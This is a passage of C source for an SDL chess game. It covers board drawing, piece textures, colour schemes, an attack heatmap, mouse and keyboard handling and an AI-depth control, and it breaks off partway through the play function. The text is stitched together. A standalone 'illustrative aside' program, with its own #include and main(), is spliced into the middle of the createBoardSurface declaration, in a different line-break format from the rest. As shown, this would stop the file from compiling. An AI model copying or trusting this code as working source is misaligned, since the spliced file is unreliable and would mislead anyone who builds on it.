WHITE/BLUE\r\n\t\t\t\t\t\t\t{ 212, 202, 190, 100, 92, 89 }, // CHESSWEBSITE\r\n\t\t\t\t\t\t };\r\nint bgColorNum = -1;\r\nchar BG_COLOR[6];\r\n\r\nint checkColor[] = { 0xFF, 0, 0, 0x80 };\r\nint lastMoveColor[] = {0x22, 0xFF, 0xAA, 0x80};\r\n\r\nBOOL heatmap = FALSE;\r\nint atkColor[] = { 0xFF, 0, 0 };\r\nint defColor[] = { 0, 0xFF, 0 };\r\nint heatmapTransparency = 0x30;\r\n\r\nSDL_Window* window = NULL; \t\t\t// The window we'll be rendering to\r\nSDL_Surface* screenSurface = NULL; \t// The surface contained by the window\r\nSDL_Renderer* renderer = NULL; // The main renderer\r\n\r\nSDL_Texture *bgTexture, *whiteBgTexture, *checkSquare, *lastMoveSquare, *heatmapAtkSquare, *heatmapDefSquare;\r\nSDL_Texture *bPawn, *bKnight, *bBishop, *bRook, *bQueen, *bKing;\r\nSDL_Texture *wPawn, *wKnight, *wBishop, *wRook, *wQueen, *wKing;\r\n\r\nTTF_Font *font;\r\n\r\nSDL_Texture * loadImage(char * fileLocation) {\r\n\tSDL_Surface* imgSurface = NULL;\r\n imgSurface = IMG_Load( fileLocation );\r\n\r\n if( imgSurface == NULL ) {\r\n printf( \"Unable to load image %s! SDL Error: %s\\n\", fileLocation, SDL_GetError() );\r\n return NULL;\r\n }\r\n\r\n SDL_Texture * dstTexture = SDL_CreateTextureFromSurface(renderer, imgSurface);\r\n SDL_FreeSurface( imgSurface );\r\n\r\n return dstTexture;\r\n}\r\n\r\nvoid loadImages(void) {\r\n\tbPawn = loadImage(\"images/black_pawn.png\");\r\n\tbKnight = loadImage(\"images/black_knight.png\");\r\n\tbBishop = loadImage(\"images/black_bishop.png\");\r\n\tbRook = loadImage(\"images/black_rook.png\");\r\n\tbQueen = loadImage(\"images/black_queen.png\");\r\n\tbKing = loadImage(\"images/black_king.png\");\r\n\r\n\twPawn = loadImage(\"images/white_pawn.png\");\r\n\twKnight = loadImage(\"images/white_knight.png\");\r\n\twBishop = loadImage(\"images/white_bishop.png\");\r\n\twRook = loadImage(\"images/white_rook.png\");\r\n\twQueen = loadImage(\"images/white_queen.png\");\r\n\twKing = loadImage(\"images/white_king.png\");\r\n}\r\n\r\nvoid close() {\r\n SDL_FreeSurface( screenSurface );\r\n screenSurface = NULL;\r\n\r\n SDL_DestroyWindow( window );\r\n window = NULL;\r\n SDL_Quit();\r\n}\r\n\r\nSDL_Rect index2rect(int index, char color) {\r\n\tint file = index%8;\r\n\tint rank = index/8;\r\n\r\n\tSDL_Rect tile;\r\n\r\n\tif (color == WHITE) {\r\n\t\ttile.x = file*TILE_SIDE;\r\n\t\ttile.y = (7-rank)*TILE_SIDE;\r\n\t\ttile.w = TILE_SIDE;\r\n\t\ttile.h = TILE_SIDE;\r\n\t} else if (color == BLACK) {\r\n\t\ttile.x = (7-file)*TILE_SIDE;\r\n\t\ttile.y = rank*TILE_SIDE;\r\n\t\ttile.w = TILE_SIDE;\r\n\t\ttile.h = TILE_SIDE;\r\n\t}\r\n\r\n\treturn tile;\r\n}\r\n\r\nSDL_Rect bb2rect(Bitboard bb, char color) {\r\n\treturn index2rect(bb2index(bb), color);\r\n}\r\n\r\nint xy2index(int x, int y, char color) {\r\n\tint file=0, rank=0;\r\n\tif (color == WHITE) {\r\n\t\tfile = (int) (x/TILE_SIDE);\r\n\t\trank = (int) (7 - (y/TILE_SIDE));\r\n\t} else if (color == BLACK) {\r\n\t\tfile = (int) (7 - (x/TILE_SIDE));\r\n\t\trank = (int) (y/TILE_SIDE);\r\n\t}\r\n\treturn 8*rank + file;\r\n}\r\n\r\nvoid int2str(int index) {\r\n\tint file = index%8;\r\n\tint rank = index/8;\r\n\r\n\tprintf(\"%c%c\", FILES[file], RANKS[rank]);\r\n\tfflush(stdout);\r\n}\r\n\r\nvoid xy2str(int x, int y, char color){\r\n\tint2str(xy2index(x, y, color));\r\n}\r\n\r\nvoid paintTile(SDL_Surface * destSurface, int position, char color[], char toMove) {\r\n\tSDL_Rect tile = index2rect(position, toMove);\r\n\tSDL_FillRect( destSurface, &tile, SDL_MapRGB( destSurface->format, color[0], color[1], color[2] ) );\r\n}\r\n\r\nSDL_Surface * 
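/*
 * Illustrative aside (standalone): the board-to-screen mapping of index2rect()
 * and xy2index() above, checked as a round trip for the White orientation.
 * TILE stands in for TILE_SIDE.
 */
#include <stdio.h>

#define TILE 60

int main(void) {
	int index, failures = 0;

	for (index = 0; index < 64; index++) {
		int file = index % 8;
		int rank = index / 8;
		int x = file * TILE;              /* left edge, as in index2rect() */
		int y = (7 - rank) * TILE;        /* rank 0 is drawn at the bottom */

		int backFile = x / TILE;          /* as in xy2index() */
		int backRank = 7 - y / TILE;
		if (8 * backRank + backFile != index)
			failures++;
	}
	printf("round-trip failures: %d\n", failures);   /* expected: 0 */
	return 0;
}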
createBoardSurface(char colors[]) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * bgSurface = SDL_CreateRGBSurface(0, 8*TILE_SIDE, 8*TILE_SIDE, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\r\n\tSDL_FillRect( bgSurface, NULL, SDL_MapRGB( bgSurface->format, colors[0], colors[1], colors[2] ) );\r\n\r\n\tint i;\r\n\tfor ( i=0; i<NUM_SQUARES; i++)\r\n\t\tif ( index2bb(i) & DARK_SQUARES )\r\n\t\t\tpaintTile(bgSurface, i, &colors[3], WHITE);\r\n\r\n\treturn bgSurface;\r\n}\r\n\r\nvoid loadBackground(void) {\r\n\tSDL_Surface * bgSurface = createBoardSurface(BG_COLOR);\r\n\r\n\tSDL_DestroyTexture(bgTexture);\r\n\tbgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid loadWhiteBackground(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * bgSurface = SDL_CreateRGBSurface(0, 8*TILE_SIDE, 8*TILE_SIDE, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( bgSurface, NULL, SDL_MapRGB( bgSurface->format, 255, 255, 255 ) );\r\n\tSDL_DestroyTexture(whiteBgTexture);\r\n\twhiteBgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid renderWhiteBackground(void) {\r\n\tSDL_Rect boardRect;\r\n\tboardRect.x = 0;\r\n\tboardRect.y = 0;\r\n\tboardRect.w = 8*TILE_SIDE;\r\n\tboardRect.h = 8*TILE_SIDE;\r\n\tSDL_RenderCopy(renderer, whiteBgTexture, NULL, &boardRect);\r\n}\r\n\r\nvoid renderBackground(void) {\r\n\tSDL_Rect boardRect;\r\n\tboardRect.x = 0;\r\n\tboardRect.y = 0;\r\n\tboardRect.w = 8*TILE_SIDE;\r\n\tboardRect.h = 8*TILE_SIDE;\r\n\tSDL_RenderCopy(renderer, bgTexture, NULL, &boardRect);\r\n}\r\n\r\nvoid renderAlgebricNotation(char color) {\r\n\tif ( TILE_SIDE < 40 )\r\n\t\treturn;\r\n\r\n\tconst char * const FILES_STR[8] = {\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\" };\r\n\tconst char * const RANKS_STR[8] = {\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\" };\r\n\tint i;\r\n\r\n\tfor (i=0; i<8; i++) {\r\n\t\tSDL_Color text_color = {BG_COLOR[0+3*(i%2)], BG_COLOR[1+3*(i%2)], BG_COLOR[2+3*(i%2)]};\r\n\t\tSDL_Surface* messageSurface = TTF_RenderText_Solid(font, color==WHITE?RANKS_STR[i]:RANKS_STR[7-i], text_color);\r\n\t\tif ( messageSurface == NULL )\r\n\t\t\tcontinue;\r\n\r\n\r\n\t\tSDL_Texture* messageTexture = SDL_CreateTextureFromSurface(renderer, messageSurface);\r\n\t\tSDL_FreeSurface( messageSurface );\r\n\r\n\t\tSDL_Rect tile = index2rect(8*i, WHITE);\r\n\t\ttile.w /= 6;\r\n\t\ttile.h /= 4;\r\n\t\tSDL_RenderCopy(renderer, messageTexture, NULL, &tile);\r\n\t\tSDL_DestroyTexture(messageTexture);\r\n\r\n\t\tmessageSurface = TTF_RenderText_Solid(font, color==WHITE?FILES_STR[i]:FILES_STR[7-i], text_color);\r\n\t\tif ( messageSurface == NULL )\r\n\t\t\tcontinue;\r\n\r\n\t\tmessageTexture = SDL_CreateTextureFromSurface(renderer, messageSurface);\r\n\t\tSDL_FreeSurface( messageSurface );\r\n\r\n\t\ttile = index2rect(i, WHITE);\r\n\t\ttile.x += 1;\r\n\t\ttile.y += tile.h*3/4;\r\n\t\ttile.w /= 6;\r\n\t\ttile.h /= 4;\r\n\t\tSDL_RenderCopy(renderer, messageTexture, NULL, &tile);\r\n\t\tSDL_DestroyTexture(messageTexture);\r\n\t}\r\n}\r\n\r\nSDL_Texture * getPieceTexture(int piece) {\r\n\tswitch(piece) {\r\n\tcase BLACK|PAWN:\r\n\t\treturn bPawn;\r\n\r\n\tcase BLACK|KNIGHT:\r\n\t\treturn bKnight;\r\n\r\n\tcase BLACK|BISHOP:\r\n\t\treturn bBishop;\r\n\r\n\tcase BLACK|ROOK:\r\n\t\treturn bRook;\r\n\r\n\tcase BLACK|QUEEN:\r\n\t\treturn bQueen;\r\n\r\n\tcase 
BLACK|KING:\r\n\t\treturn bKing;\r\n\r\n\tcase WHITE|PAWN:\r\n\t\treturn wPawn;\r\n\r\n\tcase WHITE|KNIGHT:\r\n\t\treturn wKnight;\r\n\r\n\tcase WHITE|BISHOP:\r\n\t\treturn wBishop;\r\n\r\n\tcase WHITE|ROOK:\r\n\t\treturn wRook;\r\n\r\n\tcase WHITE|QUEEN:\r\n\treturn wQueen;\r\n\r\n\tcase WHITE|KING:\r\n\t\treturn wKing;\r\n\t}\r\n\r\n\treturn NULL;\r\n}\r\n\r\nvoid renderPieces(int board[], char color) {\r\n\tint i;\r\n\tfor (i=0; i<NUM_SQUARES; i++) {\r\n\t\tint piece = board[i];\r\n\r\n\t\tif ( piece != EMPTY ) {\r\n\t\t\tSDL_Rect squareRect = index2rect(i, color);\r\n\t\t\tSDL_RenderCopy(renderer, getPieceTexture(piece), NULL, &squareRect);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nvoid renderCheck(int board[], char color) {\r\n\tif (isCheck(board, WHITE)) {\r\n\t\tBitboard kingPos = getKing(board, WHITE);\r\n\t\tSDL_Rect checkRect = bb2rect(kingPos, color);\r\n\t\tSDL_RenderCopy(renderer, checkSquare, NULL, &checkRect);\r\n\t} else if (isCheck(board, BLACK)) {\r\n\t\tBitboard kingPos = getKing(board, BLACK);\r\n\t\tSDL_Rect checkRect = bb2rect(kingPos, color);\r\n\t\tSDL_RenderCopy(renderer, checkSquare, NULL, &checkRect);\r\n\t}\r\n}\r\n\r\nvoid renderLastMove(int lastMove, char color) {\r\n\tif ( lastMove != 0 ) {\r\n\t\tSDL_Rect to_Rect = bb2rect(index2bb(getTo(lastMove)), color);\r\n\t\tSDL_Rect from_Rect = bb2rect(index2bb(getFrom(lastMove)), color);\r\n\t\tSDL_RenderCopy(renderer, lastMoveSquare, NULL, &to_Rect);\r\n\t\tSDL_RenderCopy(renderer, lastMoveSquare, NULL, &from_Rect);\r\n\t}\r\n}\r\n\r\nvoid renderRegularBoard(int board[], char color, Move lastMove) {\r\n\tSDL_RenderClear(renderer);\r\n\trenderBackground();\r\n\trenderAlgebricNotation(color);\r\n\trenderCheck(board, color);\r\n\trenderLastMove(lastMove, color);\r\n\trenderPieces(board, color);\r\n\tSDL_RenderPresent(renderer);\r\n}\r\n\r\nvoid renderHeatTiles(int board[], char color) {\r\n\tint atkValue, i, j;\r\n\r\n\tfor (i=0; i<NUM_SQUARES; i++) {\r\n\t\tBitboard target = index2bb(i);\r\n\t\tatkValue = countAttacks(target, board, color) - countAttacks(target, board, opponent(color));\r\n\r\n\t\tSDL_Rect targetRect = bb2rect(target, color);\r\n\r\n\t\tif ( atkValue < 0 ) {\r\n\t\t\tfor (j=0; j<-atkValue; j++)\r\n\t\t\t\tSDL_RenderCopy(renderer, heatmapAtkSquare, NULL, &targetRect);\r\n\t\t} else if ( atkValue > 0 ) {\r\n\t\t\tfor (j=0; j<atkValue; j++)\r\n\t\t\t\tSDL_RenderCopy(renderer, heatmapDefSquare, NULL, &targetRect);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\n\r\nvoid renderHeatmapBoard(int board[], char color, Move lastMove) {\r\n\tSDL_RenderClear(renderer);\r\n\trenderWhiteBackground();\r\n\trenderHeatTiles(board, color);\r\n//\trenderCheck(board, color);\r\n//\trenderLastMove(lastMove, color);\r\n\trenderPieces(board, color);\r\n\tSDL_RenderPresent(renderer);\r\n}\r\n\r\nvoid renderBoard(int board[], char color, Move lastMove) {\r\n\tif (heatmap) {\r\n\t\trenderHeatmapBoard(board, color, lastMove);\r\n\t} else {\r\n\t\trenderRegularBoard(board, color, lastMove);\r\n\t}\r\n}\r\n\r\nvoid loadHeatTiles(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\r\n\tSDL_Surface * atkSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( atkSurf, NULL, SDL_MapRGB(screenSurface->format, atkColor[0], atkColor[1], atkColor[2]));\r\n\tSDL_DestroyTexture(heatmapAtkSquare);\r\n\theatmapAtkSquare = SDL_CreateTextureFromSurface(renderer, atkSurf);\r\n\tSDL_SetTextureBlendMode( heatmapAtkSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_SetTextureAlphaMod( heatmapAtkSquare, 
heatmapTransparency );\r\n\tSDL_FreeSurface( atkSurf );\r\n\r\n\tSDL_Surface * defSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( defSurf, NULL, SDL_MapRGB(screenSurface->format, defColor[0], defColor[1], defColor[2]));\r\n\tSDL_DestroyTexture(heatmapDefSquare);\r\n\theatmapDefSquare = SDL_CreateTextureFromSurface(renderer, defSurf);\r\n\tSDL_SetTextureBlendMode( heatmapDefSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_SetTextureAlphaMod( heatmapDefSquare, heatmapTransparency );\r\n\tSDL_FreeSurface( defSurf );\r\n}\r\n\r\nvoid loadCheckSquare(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * checkSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( checkSurf, NULL, SDL_MapRGB(&fmt, checkColor[0], checkColor[1], checkColor[2]) );\r\n\r\n\tSDL_DestroyTexture(checkSquare);\r\n\tcheckSquare = SDL_CreateTextureFromSurface(renderer, checkSurf);\r\n\r\n\tSDL_SetTextureBlendMode( checkSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_SetTextureAlphaMod( checkSquare, checkColor[3] );\r\n\tSDL_FreeSurface( checkSurf );\r\n}\r\n\r\nvoid loadLastMoveSquare(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * lastMoveSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, 0xff000000, 0xff0000, 0xff00, 0xff );\r\n\r\n\tSDL_FillRect( lastMoveSurf, NULL, SDL_MapRGBA(lastMoveSurf->format, lastMoveColor[0], lastMoveColor[1], lastMoveColor[2], lastMoveColor[3]) );\r\n\tSDL_Rect dest = {1,1,8,8};\r\n\tSDL_FillRect( lastMoveSurf, &dest, SDL_MapRGBA(lastMoveSurf->format,0,0,0,0) );\r\n\r\n\tSDL_DestroyTexture(lastMoveSquare);\r\n\tlastMoveSquare = SDL_CreateTextureFromSurface(renderer, lastMoveSurf);\r\n\r\n\tSDL_SetTextureBlendMode( lastMoveSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_FreeSurface( lastMoveSurf );\r\n}\r\n\r\nvoid nextColorScheme(void) {\r\n\tint colorCount = (int) (sizeof(COLOR_SQUEMES)/6);\r\n\r\n\tbgColorNum++;\r\n\tbgColorNum %= colorCount;\r\n\r\n\tint i;\r\n\tfor (i=0;i<6;i++)\r\n\t\tBG_COLOR[i] = COLOR_SQUEMES[bgColorNum][i];\r\n\r\n\tloadBackground();\r\n}\r\n\r\nvoid randomColorScheme(void) {\r\n\tint colorCount = (int) (sizeof(COLOR_SQUEMES)/6);\r\n\r\n\tint newColor = rand() % colorCount;\r\n\twhile ( newColor == bgColorNum ) { newColor = rand() % colorCount; }\r\n\tbgColorNum = newColor;\r\n\r\n\tint i;\r\n\tfor (i=0;i<6;i++)\r\n\t\tBG_COLOR[i] = COLOR_SQUEMES[bgColorNum][i];\r\n\r\n\tloadBackground();\r\n}\r\n\r\n\r\nvoid loadRandomTintedBackground(void) {\r\n\tint i;\r\n\tfor (i=0; i<3; i++) {\r\n\t\tint value = (rand() % 256);\r\n\t\tBG_COLOR[i] = (unsigned char) (value + 0.5*(255-value));\r\n\t\tBG_COLOR[i+3] = (unsigned char) value;\r\n\t}\r\n\r\n\tSDL_Surface * bgSurface = createBoardSurface(BG_COLOR);\r\n\r\n\tSDL_DestroyTexture(bgTexture);\r\n\tbgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid loadRandomBackground(void) {\r\n\tint i;\r\n\tfor (i=0; i<6; i++) {\r\n\t\tBG_COLOR[i] = (unsigned char) (rand() % 256);\r\n\t}\r\n\r\n\tSDL_Surface * bgSurface = createBoardSurface(BG_COLOR);\r\n\r\n\tSDL_DestroyTexture(bgTexture);\r\n\tbgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid loadFont() {\r\n\tfont = TTF_OpenFont(\"open-sans/OpenSans-Bold.ttf\", 48);\r\n}\r\n\r\nBOOL init() {\r\n\tsrand(time(NULL));\r\n\r\n if( SDL_Init( SDL_INIT_VIDEO ) < 0 ) {\r\n 
printf( \"SDL could not initialize! SDL_Error: %s\\n\", SDL_GetError() );\r\n return FALSE;\r\n }\r\n\r\n\twindow = SDL_CreateWindow( \"Chess Game\", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, 8*TILE_SIDE, 8*TILE_SIDE, SDL_WINDOW_SHOWN|SDL_WINDOW_RESIZABLE );\r\n\r\n\tif( window == NULL ) {\r\n\t\tprintf( \"Window could not be created! SDL_Error: %s\\n\", SDL_GetError() );\r\n\t\treturn FALSE;\r\n\t}\r\n\r\n\tint imgFlags = IMG_INIT_PNG;\r\n\r\n\tif( !( IMG_Init( imgFlags ) & imgFlags ) ) {\r\n\t\tprintf( \"SDL_image could not initialize! SDL_image Error: %s\\n\", IMG_GetError() );\r\n\t\treturn FALSE;\r\n\t}\r\n\r\n\tif( TTF_Init() == -1 ) {\r\n\t printf(\"TTF_Init error: %s\\n\", TTF_GetError());\r\n\t return FALSE;\r\n\t}\r\n\r\n\tscreenSurface = SDL_GetWindowSurface( window );\r\n\r\n\trenderer = SDL_GetRenderer(window);\r\n\tSDL_SetRenderDrawBlendMode(renderer, SDL_BLENDMODE_BLEND);\r\n\r\n\trandomColorScheme();\r\n\tloadBackground();\r\n\tloadWhiteBackground();\r\n\tloadCheckSquare();\r\n\tloadLastMoveSquare();\r\n\tloadImages();\r\n\tloadHeatTiles();\r\n\tloadFont();\r\n\r\n return TRUE;\r\n}\r\n\r\nvoid setEndTitle(Position * position) {\r\n\tif (isCheckmate(position)) {\r\n\t\tif (position->toMove == BLACK) {\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game - WHITE wins!\");\r\n\t\t\tprintf(\"WHITE wins!\\n\");\r\n\t\t} else {\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game - BLACK wins!\");\r\n\t\t\tprintf(\"BLACK wins!\\n\");\r\n\t\t}\r\n\t} else if (isStalemate(position)) {\r\n\t\tSDL_SetWindowTitle(window, \"Chess Game - Draw by stalemate!\");\r\n\t\tprintf(\"Draw by stalemate!\\n\");\r\n\t} else if (hasInsufficientMaterial(position->board)) {\r\n\t\tSDL_SetWindowTitle(window, \"Chess Game - Draw by insufficient material!\");\r\n\t\tprintf(\"Draw by insufficient material!\\n\");\r\n\t} else if (isOver75MovesRule(position)) {\r\n\t\tSDL_SetWindowTitle(window, \"Chess Game - Draw by 75-move rule!\");\r\n\t\tprintf(\"Draw by 75-move rule!\\n\");\r\n\t}\r\n\tfflush(stdout);\r\n}\r\n\r\nvoid cyclePiece(Game * game, int leavingPos) {\r\n\tif (game->position.board[leavingPos] == (WHITE|KING)) {\r\n\t\tgame->position.board[leavingPos] = BLACK|PAWN;\r\n\t} else {\r\n\t\tgame->position.board[leavingPos] += 1;\r\n\t\tgame->position.board[leavingPos] %= 15;\r\n\t}\r\n}\r\n\r\nvoid handleEvent(SDL_Event event, Game * game, char * color, BOOL * hasAI, int * AIdepth, BOOL * run, BOOL * ongoing, BOOL * editing, int * leavingPos, int * arrivingPos, Move * lastMove) {\r\n\r\n\tswitch (event.type) {\r\n\tcase SDL_QUIT:\r\n\t\t*run = FALSE;\r\n\t\tbreak;\r\n\r\n\tcase SDL_MOUSEMOTION:\r\n\t\tbreak;\r\n\r\n\tcase SDL_MOUSEBUTTONDOWN:\r\n\t\t*leavingPos = xy2index(event.motion.x, event.motion.y, *color);\r\n\t\tbreak;\r\n\r\n\tcase SDL_MOUSEBUTTONUP:\r\n\t\t*arrivingPos = xy2index(event.motion.x, event.motion.y, *color);\r\n\r\n\t\tif (*editing) {\r\n\t\t\tif (*leavingPos == *arrivingPos) {\r\n\t\t\t\tcyclePiece(game, *leavingPos);\r\n\t\t\t} else {\r\n\t\t\t\tmovePiece(game->position.board, generateMove(*leavingPos, *arrivingPos));\r\n\t\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\tif ( *ongoing && ( !*hasAI || game->position.toMove == *color) ) {\r\n\t\t\t\tMove moves[MAX_BRANCHING_FACTOR];\r\n\t\t\t\tint moveCount = legalMoves(moves, &(game->position), game->position.toMove);\r\n\r\n\t\t\t\tint i;\r\n\t\t\t\tfor (i=0; i<moveCount; i++) {\r\n\t\t\t\t\tif (generateMove(*leavingPos, *arrivingPos) == moves[i]) {\r\n\t\t\t\t\t\t*lastMove = 
moves[i];\r\n\r\n\t\t\t\t\t\tprintf(\"Player made move as %s: \", game->position.toMove==WHITE?\"white\":\"black\");\r\n\t\t\t\t\t\tprintFullMove(*lastMove, game->position.board);\r\n\t\t\t\t\t\tprintf(\".\\n\");\r\n\t\t\t\t\t\tfflush(stdout);\r\n\r\n\t\t\t\t\t\tmakeMove(game, *lastMove);\r\n\t\t\t\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\r\n\t\t\t\t\t\tif ( hasGameEnded(&(game->position)) ) {\r\n\t\t\t\t\t\t\t*ongoing = FALSE;\r\n\t\t\t\t\t\t\tsetEndTitle(&(game->position));\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t\tbreak;\r\n\r\n\tcase SDL_KEYDOWN:\r\n\t\tswitch( event.key.keysym.sym ) {\r\n\t\tcase SDLK_a:\r\n\t\t\t*hasAI = *hasAI?FALSE:TRUE;\r\n\t\t\tprintf(\"AI opponent is now %s.\\n\", *hasAI?\"ENABLED\":\"DISABLED\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_c:\r\n\t\t\theatmap = FALSE;\r\n\t\t\tnextColorScheme();\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_d:\r\n\t\t\tdumpContent(game);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_e:\r\n\t\t\t*editing = *editing?FALSE:TRUE;\r\n\t\t\tif (*editing) {\r\n\t\t\t\t*lastMove = 0;\r\n\t\t\t} else {\r\n\t\t\t\tgame->position.epSquare = -1;\r\n\t\t\t\tgame->position.castlingRights = CASTLE_KINGSIDE_WHITE|CASTLE_QUEENSIDE_WHITE|CASTLE_KINGSIDE_BLACK|CASTLE_QUEENSIDE_BLACK;\r\n\t\t\t\tgame->position.halfmoveClock = 0;\r\n\t\t\t\tgame->position.fullmoveNumber = 1;\r\n\r\n\t\t\t\tchar fen[MAX_FEN_LEN];\r\n\t\t\t\ttoFen(fen, &(game->position));\r\n\t\t\t\tgetFenGame(game, fen);\r\n\t\t\t}\r\n\t\t\tprintf(\"Editing %s.\\n\", *editing?\"enabled\":\"disabled\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_h:\r\n\t\t\theatmap = heatmap?FALSE:TRUE;\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tprintf(\"Heatmap %s.\\n\", heatmap?\"enabled\":\"disabled\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_i:\r\n\t\t\t*color = opponent(*color);\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tprintf(\"Now playing as %s.\\n\", *color==WHITE?\"WHITE\":\"BLACK\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_m:\r\n\t\t\tprintLegalMoves(&(game->position));\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_p:\r\n\t\t\tdumpPGN(game, *color, *hasAI);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_q:\r\n\t\tcase SDLK_ESCAPE:\r\n\t\t\t*run = FALSE;\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_r:\r\n\t\t\theatmap = FALSE;\r\n\t\t\tloadRandomBackground();\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_t:\r\n\t\t\theatmap = FALSE;\r\n\t\t\tloadRandomTintedBackground();\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_u:\r\n\t\t\tif (*editing) return;\r\n\t\t\tunmakeMove(game);\r\n\t\t\tif ( *hasAI ) unmakeMove(game);\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game\");\r\n\t\t\t*ongoing = TRUE;\r\n\t\t\t*lastMove = getLastMove(game);\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tprintf(\"Last move was undone.\\n\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_v:\r\n\t\t\tprintf(\"Board evaluation = %.2f\\n\", staticEvaluation(&(game->position))/100.0);\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_UP:\r\n\t\t\t(*AIdepth)++;\r\n\t\t\tprintf(\"Search base depth increased to %d.\\n\", *AIdepth);\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_DOWN:\r\n\t\t\tif (*AIdepth==1) {\r\n\t\t\t\tprintf(\"Search base 
depth is 1.\\n\");\r\n\t\t\t} else {\r\n\t\t\t\t(*AIdepth)--;\r\n\t\t\t\tprintf(\"Search base depth decreased to %d.\\n\", *AIdepth);\r\n\t\t\t}\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tdefault:\r\n//\t\t\tprintf(\"User pressed key: '%s' key acting as '%s' key\\n\", SDL_GetScancodeName(event.key.keysym.scancode), SDL_GetKeyName(event.key.keysym.sym));\r\n\t\t\tprintf(\"Pressing '%s' does nothing!\\n\", SDL_GetKeyName(event.key.keysym.sym));\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tbreak;\r\n\r\n\t\tcase SDL_WINDOWEVENT:\r\n\t\t\tswitch (event.window.event) {\r\n\t\t\tcase SDL_WINDOWEVENT_RESIZED:\r\n\t\t\t\tif ( event.window.data1 != 8*TILE_SIDE ) {\r\n\t\t\t\t\tTILE_SIDE = (int) (event.window.data1/8);\r\n\t\t\t\t} else if ( event.window.data2 != 8*TILE_SIDE ) {\r\n\t\t\t\t\tTILE_SIDE = (int) (event.window.data2/8);\r\n\t\t\t\t}\r\n\t\t\t\tSDL_SetWindowSize(window, 8*TILE_SIDE, 8*TILE_SIDE);\r\n\t\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\t\tfflush(stdout);\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t}\r\n}\r\n\r\nvoid play(char color, BOOL hasAI, int AIdepth) {\r\n\thasAI?printf(\"Playing as %s!\\n\", color==WHITE?\"WHITE\":\"BLACK\"):printf(\"Playing as both colors!\\n\");\r\n\tfflush(stdout);\r\n\r\n\tGame game;\r\n\tgetInitialGame(&game);\r\n\r\n\tBOOL run = TRUE, ongoing = TRUE, editing = FALSE;\r\n\tSDL_Event event;\r\n\r\n\tint leavingPos = -1, 